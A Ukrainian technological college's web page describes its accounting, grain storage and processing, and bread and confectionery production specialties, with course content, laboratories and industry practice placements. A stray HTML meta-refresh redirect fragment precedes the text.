http-equiv="Refresh" content="5; URL=http://www.t55555.at.ua"

 

   Спеціальність Бухгалтерський облік

Сьогодні, з появою нових форм підприємницької діяльності бухгалтер, крім обліку має також знаннями і в економіці.

Навчальний процес в Технологічному коледжі забезпечує рівень Бухгалтер з дипломом молодший спеціаліст, компетентним у застосуванні інформаційних систем, аналізі господарських операцій та економічних подій, умінні розуміти і аналізувати дані про діяльність підприємств, фінансову і податкову звітність, необхідні для прийняття управлінських рішень, проводити аудит, консультувати з питань оподаткування та менеджменту.

Підготовка фахівців грунтується на вивченні бухгалтерського обліку та аудиту, менеджменту і бізнесу, економіки, податкової системи, статистики, господарського законодавства, сучасної організації діловодства в т.ч, а також на засвоєнні студентами комплексу знань і досвіду, необхідних для ефективного виконання професійних функцій в сучасних економічних умовах.

Фахівці з бухобліку конкурентноздатні на ринку праці, успішні в підприємницькії  діяльності та на держслужбі, займають посади керівників та провідних фахівців на підприємствах різних форм власності, в податкових адміністраціях, пенсійних і фінансових фондах, контрольно-ревізійних управліннях, держказначействах.

   Спеціальність Зберігання і переробка зерна

Діяльність фахівців пов'язана з технологіями зберігання зерна на елеваторах, переробкой зерна в крупу та борошно на борошномельних і круп'яних заводах і виробництвом комбікормів.

Підготовка майбутніх фахівців об'єднує фундаментальні предмети з інженерно-технічними та економічними із застосуванням інформаційних технологій.

В Україні більше 800 підприємств, в т.ч приватних займаються зберіганням і переробкою зерна, також є представництва зарубіжних фірм. Всі вони вимагають висококваліфікованих фахівців у галузі зернопереробки.

Закріплюють теорію і набирають досвід студенти в час практик на підприємствах галузі, найбільші з них: "Дніпромлин", Дніпропетровський комбінат харчових концентратів, "Універсалзернопродукт".

 

Спеціальність - виробництво хліба, кондитерських, макаронних виробів та харчових концентратів

         Прообразом хліба були зерна злаків. Поступово люди почали змішувати їх з водою і варити, так з’явилися каші. І лише 15000 років до нашої ери  з’явилися перші коржики із зерен. Наступний етап доводиться на 2600-3000 років до нашої ери. Тоді єгиптяни навчилися використовувати дріжджі для випікання хліба. Потім мистецтво випікання хліба освоїли греки, а там і римляни. Римляни ж і удосконалили процес хлібопечення. Вони навчилися перемелювати зерна, винайшли печі, і вже в середні віки по всій Європі з’явилися булочні.

         Хліб був і залишається одним із важливіших продуктів у світі.       А дізнатися всі тонкощі мистецтва виробництва хліба, запрошуємо до нашого навчального закладу на спеціальність «Виробництво хліба, кондитерських, макаронних виробів і харчо концентратів» , яку було відкрито в навчальному закладі у 2007 році, а перший набір студентів було здійснено у 2008 році.

         Під час навчання в коледжі студенти  цієї спеціальності вивчають класичні та інноваційні технології виробництва хліба, хлібобулочних і  макаронних виробів, цукристих та борошняних кондитерських виробів, харчових концентратів.

         Навчальні заняття з професійної та практичної підготовки проводяться в наступних лабораторіях і кабінетах навчального закладу:

- кабінет технології галузі

- кабінет технологічного контролю виробництва

- кабінет основ стандартизації

- кабінет курсового і дипломного проектування

- лабораторія процесів і апаратів

- лабораторія компьютерізації виробництва

         При всіх лабораторіях і кабінетах діють гуртки, де студенти займаються науково – дослідною роботою та виготовленням наочності.

         Високий рівень фахової освіти забезпечують різні види практики, які студенти проходять на передових підприємствах галузі: ПАТ кондитерська фабрика «А.В.К.» м. Дніпропетровськ», кондитерська фабрика «КЛИМ», ТОВ «Кондитерська фабрика «Квітень» , ПрАТ «Дніпропетровський хлібозавод № 9», ТОВ «Дніпровський хлібокомбінат № 11», ТОВ «Хлібозавод № 10», ДП «Дніпропетровський хлібокомбінат № 2», ТОВ «Гея», ПАТ «Дніпропетровський комбінат харчових концентратів».

         Під час виробничої практики студенти оволодівають практичними уміннями з визначених навчальним планом робітничих професій, дублюють обов’язки та стажуються на посадах змінного майстра, змінного технолога, техніка – технолога у контрольно – виробничій технологічній лабораторії, беруть участь в освоєнні нових видів продукції, інноваційних технологій і устаткування.

         Випускники отримують кваліфікацію за освітньо – кваліфікаційним рівнем молодший спеціаліст.

         Випускною цикловою комісією для цієї спеціальності є циклова комісія  виробництва хліба.